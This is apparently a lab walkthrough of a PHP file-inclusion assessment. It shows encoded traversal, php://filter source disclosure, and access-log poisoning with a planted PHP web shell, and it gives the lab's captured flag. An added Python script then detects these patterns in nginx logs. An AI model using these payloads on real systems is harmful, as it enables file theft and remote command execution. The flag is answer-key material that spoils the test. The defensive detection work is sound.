File Inclusion
Skills Assessment
Testing:
/index.php?page=..%252F..%252F..%252F..%252Fetc%252Fpasswd - invalid input detected
/index.php?page=php://filter/read=convert.base64-encode/resource=index - returns the source of index.php, base64-encoded
The php://filter wrapper is not caught by the site's input filter, so it bypasses the check that blocked the encoded traversal attempt.
Decode the base64 index.php source at https://www.base64decode.org/
The decoded index.php references ilf_admin/index.php
Go to http://165.232.98.156:30234/ilf_admin/index.php?log=http.log
GET /ilf_admin/index.php?log=../../../../../etc/passwd
GET /ilf_admin/index.php?log=../../../../../var/log/nginx/access.log
User-Agent: Mozilla/5.0 <evil.php payload> Gecko/20100101 Firefox/102.0
evil.php payload: <?php system($_GET['cmd']); ?>
flag:a9a892dbc9faf9a014f58e007721835e
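The three request patterns above (double-encoded traversal, a php:// wrapper in the page parameter, and a PHP tag planted in the User-Agent for log poisoning) are all visible in the web server's access log. The following is an added detection example, not part of the original notes: it parses nginx combined-format lines, URL-decodes parameters repeatedly so that %252F is not missed, and flags each of the three patterns. The log lines are constructed samples.

```python
import re
from urllib.parse import unquote, urlparse, parse_qs

# Constructed sample nginx "combined" access log lines (not from the original page).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 403 12 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=php://filter/read=convert.base64-encode/resource=index HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /ilf_admin/index.php?log=../../../../../var/log/nginx/access.log HTTP/1.1" 200 4000 "-" "Mozilla/5.0 <?php phpinfo(); ?> Gecko/20100101 Firefox/102.0"',
]

# nginx combined log format: ip ident user [ts] "method target proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')            # ../ or ..\ path segment
WRAPPER_RE = re.compile(r'^(?:php|phar|zip|expect|file)://|^data:', re.I)  # PHP stream wrappers
PHP_TAG_RE = re.compile(r'<\?(?:php\b|=)', re.I)                     # PHP open tag in a header value


def fully_decode(value, rounds=3):
    """URL-decode until the value stops changing, so ..%252F becomes ../ (bounded to avoid loops)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyze(line):
    """Return a finding record for one log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    # parse_qs decodes once; fully_decode catches the extra encoding layer the site's filter missed
    for name, values in parse_qs(urlparse(m['target']).query, keep_blank_values=True).items():
        for v in values:
            v = fully_decode(v)
            if TRAVERSAL_RE.search(v):
                findings.append(f'traversal in {name}')
            if WRAPPER_RE.search(v):
                findings.append(f'wrapper in {name}')
    for field in ('ua', 'ref'):  # headers that end up in the access log and could be included back
        if PHP_TAG_RE.search(m[field]):
            findings.append(f'php tag in {field}')
    return {'ip': m['ip'], 'target': m['target'], 'findings': findings}


def scan(lines):
    """Return only the records that produced at least one finding."""
    return [r for r in map(analyze, lines) if r and r['findings']]


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit['ip'], hit['target'], hit['findings'])
```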